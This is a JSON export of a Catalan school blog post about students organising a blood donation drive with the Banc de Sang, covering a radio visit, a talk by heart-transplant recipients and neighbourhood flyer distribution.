{"id":2746,"date":"2017-02-20T13:30:24","date_gmt":"2017-02-20T12:30:24","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2746"},"modified":"2018-05-06T07:13:24","modified_gmt":"2018-05-06T05:13:24","slug":"la-noticia-del-banc-de-sang","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/","title":{"rendered":"L&#8217;institut ajuda al Banc de sang"},"content":{"rendered":"<p>Alumnat\u00a0___\u00a0[\u00a01rD i 2nD d&#8217;ESO]<\/p>\n<p><strong>El 7 de mar\u00e7 vine a donar sang a l\u00b4Institut Consell de Cent<\/strong><\/p>\n<p>L&#8217;alumnat\u00a0de 1rD i 2nD estem fent un projecte de donaci\u00f3 de sang, conjuntament amb la col\u00b7laboraci\u00f3 del <a href=\"http:\/\/www.bancsang.net\/\" target=\"_blank\">Banc de sang<\/a>. El 7 de mar\u00e7 a partir de les 15:15 h fins a les 19:15 h es podr\u00e0 donar sang a l&#8217;Institut Consell de cent.<br \/>\nAquest dia\u00a0es despla\u00e7ar\u00e0 una unitat del banc de sang a l&#8217;institut per recollir sang de les donacions de la gent del Poble Sec i rodalies.<br \/>\nEstem fent el possible per donar\u00a0m\u00e0xima difusi\u00f3 de la recollida, i aix\u00ed fer que la gent s\u00b4assabenti de la campanya, i pugui vingui a donar sang. \u00c9s important recollir molta sang, perqu\u00e8 el Banc de sang necessita 1.000 donacions cada dia.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/oficial-d1\/\" rel=\"attachment wp-att-2829\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2829\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/oficial-D1.png\" alt=\"oficial-d1\" width=\"400\" height=\"488\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/oficial-D1.png 605w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/oficial-D1-246x300.png 246w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/cartell-donacio-de-sang-1rd-i-2nd\/\" rel=\"attachment wp-att-2905\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2905\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Cartell-donaci\u00f3-de-sang-1rD-i-2nD-724x1024.jpg\" alt=\"cartell-donacio-de-sang-1rd-i-2nd\" width=\"345\" height=\"488\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Cartell-donaci\u00f3-de-sang-1rD-i-2nD-724x1024.jpg 724w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Cartell-donaci\u00f3-de-sang-1rD-i-2nD-212x300.jpg 212w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Cartell-donaci\u00f3-de-sang-1rD-i-2nD-768x1086.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Cartell-donaci\u00f3-de-sang-1rD-i-2nD.jpg 992w\" sizes=\"auto, (max-width: 345px) 100vw, 345px\" \/><\/a><\/p>\n<blockquote><p>REQUISITS:<br \/>\n-S\u2019ha de pesar m\u00e9s de 50 kg.<br \/>\n-S\u2019ha de tenir entre 18 i 65 anys.<br \/>\n-No cal estar en dej\u00fa.<br \/>\n-S\u2019ha d\u2019haver passat l\u2019hepatitis abans dels 12 anys.<br \/>\n-No es pot estar embarassada.<\/p><\/blockquote>\n<p>Trobem 4 grups sanguinis que s\u00f3n A,B,AB,0. I aquests tamb\u00e9 poden ser positius o negatius.<br \/>\nPer finalitzar, animeu-vos i veniu\u00a0a salvar vides amb la vostra sang. Gr\u00e0cies. Us esperem!<\/p>\n<p>L&#8217;alumnat, s&#8217;est\u00e0 mobilitzant per aconseguir la m\u00e0xima difusi\u00f3 de l&#8217;esdeveniment, aqu\u00ed teniu el v\u00eddeo de presentaci\u00f3, amb el magn\u00edfic muntatge fet\u00a0per Mahi, i seguidament s&#8217;ha comentat l&#8217;experi\u00e8ncia d&#8217;anar a la r\u00e0dio per parlar del tema.<\/p>\n<p>https:\/\/youtu.be\/7LcN3XaeFzw<\/p>\n<h5><b>Anem a R\u00e0dio-Actius!!!!<\/b><\/h5>\n<p><span style=\"font-weight: 400;\">El passat 6 de febrer per la tarda, quatre alumnes de 1r D i un alumne de 2n D, acompanyats de dues de les nostres professores, vam anar a parlar del nostre projecte del Banc de Sang a <\/span><a href=\"https:\/\/radioactius.org\/\"><span style=\"font-weight: 400;\">R\u00e0dio-Actius<\/span><\/a><span style=\"font-weight: 400;\">, un projecte de r\u00e0dio comunit\u00e0ria del barri del Poble Sec. Aquell dia el programa de r\u00e0dio anava sobre salut i alimentaci\u00f3. Vam aprofitar el tema per explicar que estem fent un projecte en col\u00b7laboraci\u00f3 amb el Banc de Sang i per convidar a la gent a venir al nostre institut a donar sang el proper 7 de mar\u00e7 de 15.15h fins a les 19.15h! Us hi esperem, el banc de Sang us necessita!!!<\/span><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170206_182750\/\" rel=\"attachment wp-att-2831\">\u00a0<\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170206_182750\/\" rel=\"attachment wp-att-2831\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2831\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170206_182750-1024x576.jpg\" alt=\"img_20170206_182750\" width=\"400\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170206_182750-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170206_182750-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170206_182750-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170206_182750.jpg 1417w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_5305\/\" rel=\"attachment wp-att-2846\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2846\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_5305.jpg\" alt=\"img_5305\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_5305.jpg 709w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_5305-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_5305-200x150.jpg 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><span style=\"font-weight: 400;\">Anar a la r\u00e0dio va ser una experi\u00e8ncia molt divertida! Us deixem <a href=\"https:\/\/radioactius.org\/2017\/02\/09\/poble-sec-salut-i-bon-profit\/\" target=\"_blank\">aqu\u00ed el programa<\/a> per a que ens pugueu escoltar. <\/span><\/p>\n<h5><strong>Club de la cremallera<\/strong><\/h5>\n<p><span style=\"font-weight: 400;\">En l\u2019entorn del nostre projecte del Banc de Sang, el dia 31 de gener ens van venir a veure dues dones que havien rebut un trasplantament de cor. Les dones venien del \u201c<\/span><a href=\"http:\/\/clubdelacremallera.cat\/\"><span style=\"font-weight: 400;\">Club de la cremallera<\/span><\/a><span style=\"font-weight: 400;\">\u201d<\/span><span style=\"font-weight: 400;\">: el club, que es troba al barri del Poble Sec, rep el seu nom, perqu\u00e8 despr\u00e9s de que et facin un trasplantament de cor, la cicatriu que et queda prop del cor, sembla la d\u2019una cremallera. S\u00f3n membres del club totes aquelles persones que s\u2019han vist afectades per problemes card\u00edacs i ofereixen ajuda a la gent que t\u00e9 problemes de cor, i necessita suport o nformaci\u00f3.<\/span><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/institut-consell-de-cent-1\/\" rel=\"attachment wp-att-2845\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2845\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Institut-Consell-de-Cent-1-1024x576.jpg\" alt=\"institut-consell-de-cent-1\" width=\"600\" height=\"338\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Institut-Consell-de-Cent-1-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Institut-Consell-de-Cent-1-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Institut-Consell-de-Cent-1-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Institut-Consell-de-Cent-1.jpg 1328w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p><span style=\"font-weight: 400;\">Les dues noies que van venir ens van explicar que quan a elles els hi van fer el trasplantament el cor van necessitar molta sang. Els van haver de fer moltes transfusions. Ens van explicar que realment, la gent que els hi va donar la seva sang, en part els hi van salvar la vida.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Vam compartir la tarda amb elles i van estar contestant a totes les nostres preguntes. Moltes gr\u00e0cies!!!<\/span><\/p>\n<h5><strong>Avui toca difusi\u00f3!<\/strong><\/h5>\n<p>Com ja sabeu,l&#8217;alumnat de 1rD i 2nD estan estudiant el projecte del banc de sang. Despr\u00e9s de treballar sobre el tema i tenir molts coneixements, ara ens toca fer la difusi\u00f3. Avui dimarts dia 28 de febrer hem sortit pel barri a repartir els flyers i els cartells de promoci\u00f3. Hem fet tres grups: un grup anava al cap les Hortes, altra grup anava al cap de Manso i per \u00faltim el tercer grup hem fet la disfusi\u00f3 pels comer\u00e7os, bars, botigues i escoles del barri.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170228_162246\/\" rel=\"attachment wp-att-2872\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2872 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162246-300x169.jpg\" alt=\"img_20170228_162246\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162246-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162246-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162246.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170228_160833\/\" rel=\"attachment wp-att-2870\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2870 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_160833-300x169.jpg\" alt=\"img_20170228_160833\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_160833-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_160833-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_160833.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Com explicar-vos que aquestes experi\u00e8ncies s\u00f3n les que donen sentit la nostra feina? No \u00e9s f\u00e0cil d&#8217;explicar.\u00a0<span style=\"font-family: inherit; font-size: 1em;\">El resultat \u00e9s molt positiu, ens hem divertit i tenim la sensaci\u00f3 d&#8217;aportar molt per aquesta causa. Donar sang \u00e9s un fet que requereix molta generositat. Gr\u00e0cies a tots el que heu fet possible aquest petit\/gran fet. D\u00d3NA I SALVA!!<\/span><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170228_163625\/\" rel=\"attachment wp-att-2875\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2875\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_163625-300x275.jpg\" alt=\"img_20170228_163625\" width=\"264\" height=\"242\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_163625-300x275.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_163625-768x704.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_163625.jpg 850w\" sizes=\"auto, (max-width: 264px) 100vw, 264px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170228_162754\/\" rel=\"attachment wp-att-2874\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2871\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_161955-300x287.jpg\" alt=\"img_20170228_161955\" width=\"253\" height=\"242\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_161955-300x287.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_161955-768x735.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_161955.jpg 850w\" sizes=\"auto, (max-width: 253px) 100vw, 253px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2874 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162754-300x242.jpg\" alt=\"img_20170228_162754\" width=\"300\" height=\"242\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162754-300x242.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162754-768x619.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_162754.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2869 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_154344-300x211.jpg\" alt=\"img_20170228_154344\" width=\"300\" height=\"211\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_154344-300x211.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_154344-768x539.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_154344.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_20170228_165752\/\" rel=\"attachment wp-att-2868\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2868\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_165752-300x218.jpg\" alt=\"img_20170228_165752\" width=\"291\" height=\"211\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_165752-300x218.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_165752-768x557.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20170228_165752.jpg 850w\" sizes=\"auto, (max-width: 291px) 100vw, 291px\" \/><\/a><\/p>\n<p>A la mat\u00e8ria de tecnologia s&#8217;ha dissenyat un faristol per aguantar els fulletons informatius.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/20170301_132429\/\" rel=\"attachment wp-att-2901\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2901 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/20170301_132429-300x225.jpg\" alt=\"20170301_132429\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/20170301_132429-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/20170301_132429-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/20170301_132429-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/20170301_132429.jpg 992w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Per\u00f2, qu\u00e8 \u00e9s aquesta oloreta que arriba fins a la sala de profes?\u00a0Ja estem fent les galetes i el past\u00eds per obsequiar als donants de sang.<\/p>\n<p>Ha estat una activitat molt i molt dol\u00e7a!!!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2911\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella8-225x300.jpg\" alt=\"foto-enviada-per-francesc-casabella8\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella8-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella8.jpg 425w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2913\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella6-225x300.jpg\" alt=\"foto-enviada-per-francesc-casabella6\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella6-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella6.jpg 425w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2910\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella5-225x300.jpg\" alt=\"foto-enviada-per-francesc-casabella5\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella5-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella5.jpg 425w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2912\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella7-225x300.jpg\" alt=\"foto-enviada-per-francesc-casabella7\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella7-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella7.jpg 425w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2909\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella4-225x300.jpg\" alt=\"foto-enviada-per-francesc-casabella4\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella4-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella4.jpg 425w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2914\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-1-225x300.jpg\" alt=\"foto-enviada-per-francesc-casabella-1\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-1-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-1.jpg 425w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2908\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella3-185x300.jpg\" alt=\"foto-enviada-per-francesc-casabella3\" width=\"185\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella3-185x300.jpg 185w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella3.jpg 425w\" sizes=\"auto, (max-width: 185px) 100vw, 185px\" \/><\/p>\n<p>Arriba el dia!!!<\/p>\n<p>FALTEN LES FOTOS DE LA DONACI\u00d3 DE SANG<\/p>\n<p>10-03-2017<\/p>\n<p>Final de trimestre, final de projecte, cap de setmana. Tenia tots el punts que sortiria superb\u00e9 i a m\u00e9s tal com hem sentit: &#8220;el millor dia de tot el curs&#8221;<br \/>\nHem fet molts jocs a la gespa, ens ho hem passat molt b\u00e9 jugant al mocador i la &#8220;guinda&#8221; ha estat el super vermut que hem fet al pans &amp; company del Maremagnum. I suma <em>i sigue<\/em>.. Piles carregades pel tercer trimestre!!!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2929 size-full\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3646.jpg\" alt=\"img_3646\" width=\"320\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3646.jpg 320w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3646-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3646-200x150.jpg 200w\" sizes=\"auto, (max-width: 320px) 100vw, 320px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2924\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3671.jpg\" alt=\"img_3671\" width=\"246\" height=\"240\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2926\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3689.jpg\" alt=\"img_3689\" width=\"271\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3689.jpg 436w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3689-300x266.jpg 300w\" sizes=\"auto, (max-width: 271px) 100vw, 271px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_3688\/\" rel=\"attachment wp-att-2925\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2925\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3688.jpg\" alt=\"img_3688\" width=\"352\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3688.jpg 378w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3688-300x205.jpg 300w\" sizes=\"auto, (max-width: 352px) 100vw, 352px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_3692\/\" rel=\"attachment wp-att-2927\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2927\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3692.jpg\" alt=\"img_3692\" width=\"322\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3692.jpg 480w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3692-300x224.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3692-200x150.jpg 200w\" sizes=\"auto, (max-width: 322px) 100vw, 322px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_3698\/\" rel=\"attachment wp-att-2928\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2928\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3698.jpg\" alt=\"img_3698\" width=\"249\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3698.jpg 480w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3698-300x289.jpg 300w\" sizes=\"auto, (max-width: 249px) 100vw, 249px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-noticia-del-banc-de-sang\/attachment\/img_3661\/\" rel=\"attachment wp-att-2930\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2930\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3661-e1489312675988.jpg\" alt=\"img_3661\" width=\"181\" height=\"240\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3661-e1489312675988.jpg 240w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_3661-e1489312675988-226x300.jpg 226w\" sizes=\"auto, (max-width: 181px) 100vw, 